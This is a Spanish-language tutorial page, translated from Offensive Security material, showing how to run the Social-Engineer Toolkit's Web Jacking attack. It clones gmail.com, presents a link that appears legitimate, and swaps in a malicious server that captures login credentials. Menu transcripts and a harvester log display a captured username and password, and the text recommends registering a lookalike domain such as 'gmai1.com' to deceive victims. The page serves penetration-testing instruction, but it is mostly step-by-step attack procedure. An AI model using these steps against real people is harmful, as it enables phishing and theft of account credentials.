Ataque Web Jacking
De www.metasploit-es.com.ar
Metodo de Ataque Web Jacking
El metodo de ataque web jacking creara un clon del sitio web y presentara un enlace a la victima informandole de que el sitio web ha sido movido. Esta es una nueva caracteristica de SET version 0.7. Cuando pasas sobre un enlace, la URL se presentara como la URL real, no la maquina del atacante. Asi que, por ejemplo si estas clonando gmail.com, la url al pasar por encima del enlace mostrara gmail.com. Cuando el usuario pulsa el enlace movido, gmail se abre y rapidamente es reemplazado por tu servidor web malicioso. Recuerda, puedes cambiar los tiempos del ataque webjacking en las opciones de config/set_config.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu
Enter your choice (press enter for default): 6
The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu
Enter number (1-4): 2
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Cuando la victima vaya al sitio el/ella notara en el siguiente enlace, en la URL al lado inferior izquierdo, que es gmail.com
Cuando la victima pulsa sobre el enlace, se le presentara la siguiente pagina web:
Si miras en la barra de URL, estamos en nuestro servidor web malicioso. En casos de ingenieria social, querras hacerlo creible, por lo que utilizar una direccion IP es generalmente mala idea. Mi recomendacion es que si estas haciendo un test de penetracion, registres un nombre similar para victima, asi para gmail.com podrias hacer gmai1.com (notese el 1), algo similar que puede confundir al usuario para que piense que es el sitio legitimo. La mayoria de veces ni siquiera notarian la direccion IP, pero es simplemente otra forma de asegurar que todo va sin problemas. Ahora la victima introduce usuario y contraseña en los campos, y notaras que hemos interceptado las credenciales.
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link. [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: 172.16.32.131 - - [09/Sep/2010 12:15:13] "GET / HTTP/1.1" 200 - 172.16.32.131 - - [09/Sep/2010 12:15:56] "GET /index2.html HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: ltmpl=default PARAM: ltmplcache=2 PARAM: continue=https://mail.google.com/mail/? PARAM: service=mail PARAM: rm=false PARAM: dsh=-7017428156907423605 PARAM: ltmpl=default PARAM: ltmpl=default PARAM: scc=1 PARAM: ss=1 PARAM: timeStmp= PARAM: secTok= PARAM: GALX=0JsVTaj70sk POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword PARAM: rmShown=1 PARAM: signIn=Sign+in PARAM: asts= [*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
